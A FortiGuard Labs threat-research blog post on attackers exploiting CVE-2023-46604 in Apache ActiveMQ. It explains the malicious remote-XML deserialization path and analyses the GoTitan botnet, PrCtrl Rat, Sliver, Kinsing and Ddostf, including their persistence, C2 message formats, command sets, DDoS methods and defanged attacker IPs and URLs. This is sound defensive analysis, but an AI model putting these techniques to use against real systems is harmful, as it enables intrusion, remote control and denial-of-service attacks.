GoTitan Botnet – Ongoing Exploitation on Apache ActiveMQ | FortiGuard Labs

Affected Platforms: Any OS running Apache Active MQ versions prior to 5.15.16, 5.16.7, 5.17.6, and 5.18.3
Impacted Parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical

This past October, Apache issued a critical advisory addressing CVE-2023-46604, a vulnerability involving the deserialization of untrusted data in Apache. On November 2, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-46604 to its known exploited list, KEV Catalog, indicating this vulnerability’s high risk and impact. Fortiguard Labs also released an outbreak alert and a threat signal report about the active exploitation of CVE-2023-46604, providing more details and recommendations for mitigation.

Technical details and proof-of-concept (PoC) code for CVE-2023-46604 are publicly available, making it easier for attackers to exploit this vulnerability. In recent weeks, Fortiguard Labs has detected numerous threat actors exploiting CVE-2023-46604 to disseminate diverse strains of malware. Our analysis has unveiled the emergence of a newly discovered Golang-based botnet named GoTitan and a .NET program called “PrCtrl Rat,” equipped with remote control capabilities. Additionally, we have identified other well-known malware and tools in play. Initially developed as an advanced penetration testing tool and red teaming framework, Sliver supports various callback protocols, including DNS, TCP, and HTTP(S), streamlining egress processes. Kinsing has solidified its position in cryptojacking operations, showcasing its ability to quickly capitalize on newly discovered vulnerabilities. Meanwhile, Ddostf, with a history dating back to 2016, continues to exhibit its proficiency in executing targeted Distributed Denial of Service (DDoS) attacks.

This article will detail the exploitation and provide insights into the malware associated with these recent attacks.


The attacker initiates a connection to ActiveMQ through the OpenWire protocol, typically on port 61616. By transmitting a crafted packet, the attacker triggers the system to unmarshal a class under their control. This action, in turn, prompts the vulnerable server to retrieve and load a class configuration XML file from a specified remote URL, requiring the presence of a predefined XML file hosted externally.

The known exploitation of this vulnerability involves leveraging the “ClassPathXmlApplicationContext” to load a malicious XML application configuration file from a network location via HTTP. Figure 1 shows the captured attacking traffic. The malicious XML file defines the arbitrary code intended to execute on the compromised machine. Attackers can set parameters like “cmd” or “bash” to achieve code execution on the remote vulnerable server (Figure 2).

In the following sections, we will explain how the malware works and what it does on infected systems.

Figure 1: Attacking traffic for CVE-2023-46604

Figure 1: Attacking traffic for CVE-2023-46604

Figure 2: Malicious XML files

Figure 2: Malicious XML files


Figure 3: GoTitan's XML file

Figure 3: GoTitan’s XML file

GoTitan is a new botnet discovered earlier this month. It is written in the Go programming language and is downloaded from a malicious URL, “hxxp://”. The attacker only provides binaries for x64 architectures, and the malware performs some checks before running. It also creates a file named “c.log” that records the execution time and program status. This file seems to be a debug log for the developer, which suggests that GoTitan is still in an early stage of development.

Figure 4: Save the log file

Figure 4: Save the log file

It replicates itself as “/.mod” within the system and establishes a recurring execution by registering in the cron. It then retrieves the C2 IP address and gathers essential information about the compromised endpoint, including architecture, memory, and CPU details. Compiling all the collected data using “<==>” as separators, it transmits its collected information to the C2 server. The C2 message initiates with the hard coded string “Titan<==>”.

Figure 5: Construct C2 message

Figure 5: Construct C2 message

Figure 6: C2 traffic session for GoTitan

Figure 6: C2 traffic session for GoTitan

GoTitan communicates with its C2 server by sending “xFExFE” as a heartbeat signal and waiting for further instructions. When it receives a command, it passes it to a function named “handle_socket_func2” that determines an attack method. GoTitan supports ten different methods of launching distributed denial-of-service (DDoS) attacks: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.

GoTitan DDoS


Figure 7: Sliver's XML file

Figure 7: Sliver’s XML file

Sliver, an open-source penetration testing tool developed in the Go language and available on GitHub, possesses the potential for misuse when wielded by threat actors due to its diverse features catering to each stage of penetration testing. Threat actors can leverage Sliver to compromise and control multiple targets across various platforms and architectures. The tool enables the generation of customized implants designed to elude detection, allowing for the execution of commands, file uploads and downloads, screenshot capture, and more on infected systems.

When communicating with the C2 server at “91[.]92[.]240[.]41” via HTTP requests, Sliver dynamically selects decoders for C2 messages based on parameters in the URI. Additionally, Sliver supports various encoders, including Base32, Base58, Base64, English encoder, Gzip, Hex, and PNG. The encoded C2 communication in HTTP protocol is shown in Figure 8.

Figure 8: C2 session for Sliver

Figure 8: C2 session for Sliver

PrCtrl Rat

Figure 9: PrCtrl Rat’s XML file

Figure 9: PrCtrl Rat’s XML file

The attacker retrieves the execution file from “hxxp://199[.]231[.]186[.]249:8000/unifo.dat” and stores it as “svc_veeam.exe”. The file ‘unifo.dat’ is a .Net framework program initially labeled as “prcli.exe” that was created in August and still spread via CVE-2023-46604. Figure 10 shows the PDB path and detailed information.

Figure 10: Information for uninfo.dat

Figure 10: Information for uninfo.dat

For persistence, it adds “Security Service” with the current process into the registry “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun.”

GoTitan cmdc

It then starts the connection to C2 server “173[.]214[.]167[.]155.” Once the command is received from a remote server, it checks for a length of four. If not, it exits the program. It supports five commands:

  • cmdc: Running cmd.exe with a specific command and returning the result to the server.

GoTitan file

  • file: Get file system information on a target system, such as drives or the directory, and files.

GoTitan file

  • upld: Upload file.
  • dnld: Download file.
  • ping: Heartbeat.

As of this writing, we have yet to receive any messages from the server, and the motive behind disseminating this tool remains unclear. However, once it infiltrates a user’s environment, the remote server gains control over the system.


Figure 11: Kinsing's XML file

Figure 11: Kinsing’s XML file

Kinsing fetches the bash script from “194[.]38[.]22[.]53/” It serves the following purposes:

  • System Configuration: Modifies system parameters, such as disabling the firewall, flushing iptables rules, and turning off the NMI watchdog.
  • Dependency Check: Verifies the existence of curl or wget and installs them if they are absent.
  • Process Cleanup: Terminates processes associated with specific executable names and competing miners.

GoTitan bash script

  • Binary Download and Verification: Downloads a main binary and a shared object file and then verifies the integrity of the downloaded binary using MD5 checksum.

GoTitan Binary Download and Verification

  • System Configuration: Creates a system service configuration file for the downloaded binary.
  • Cronjob Setting: Removes specific entries from the crontab related to known malicious activities. Adds a new cronjob to periodically execute a command fetched from a remote server hxxp://185[.]122[.]204[.]197/
  • Cleanup: Clears command history and removes bash history files.

GoTitan cleanup


Figure 12: Ddostf's XML file

Figure 12: Ddostf’s XML file

The batch script used by Ddostf is retrieved from “hxxp://42[.]121[.]111[.]112:81/” It configures the history log with “+o” to prevent the recording of the current session. It then installs curl to download additional execution files and eliminate any traces.

Figure 13: Batch script to deploying Ddostf

Figure 13: Batch script to deploying Ddostf

The executable file “tomcat” includes the recognizable string “” and the Base64-encoded string for “” Its characteristics align with those of a threat actor who had targeted China in 2018.

Figure 14: Ddostf's binary data

Figure 14: Ddostf’s binary data

It first verifies that it has root privilege and that the process is running on the device. It then ensures that it will persist on the device by executing the command shown below.

Figure 15: Ddostf's setting

Figure 15: Ddostf’s setting

Ddostf includes a hard-coded string, “TF-Linux kernel…,” which appends either “SYN-“ or “UDP-“ in its C2 message, depending on whether the process runs with root privileges.

Figure 16: Send C2 message

Figure 16: Send C2 message

Ddostf incorporates 13 attack methods: SYN_Flood, WZSYN_Flood, ICMP_Flood, GET_Flood, GETFT_Flood, HEAD_Flood, POST_Flood, xzcc_Flood, TCP_Flood, WZTCP_Flood, ack_Flood, WZUDP_Flood, and UDP_Flood. Additionally, it defines a function called “DNS_Flood,” which is not included in the current switch cases and is possibly intended for future enhancements.

Figure 17: DNS flood function

Figure 17: DNS flood function


Despite the release of a patch for CVE-2023-46604 over a month ago, threat actors persist in exploiting this vulnerability to distribute malware on susceptible servers. This blog introduces newly discovered threats, including the Golang-based botnet GoTitan and the .NET program “PrCtrl Rat,” which have emerged as a consequence of this exploitation. Additionally, users should remain vigilant against ongoing exploits by Sliver, Kinsing, and Ddostf. It is crucial to prioritize system updates and patching and regularly monitor security advisories to effectively mitigate the risk of exploitation.

Fortinet Protections

The malware described in this report are detected and blocked by FortiGuard Antivirus as:


FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.

Fortinet has also released an IPS signature to proactively protect our customers from the threats contained in the report:

CVE-2023-46604: Apache.ActiveMQ.CVE-2023-46604.Code.Execution

The URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.

We also suggest that organizations use Fortinet’s free NSE training module: NSE 1 – Information Security Awareness. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.

FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.


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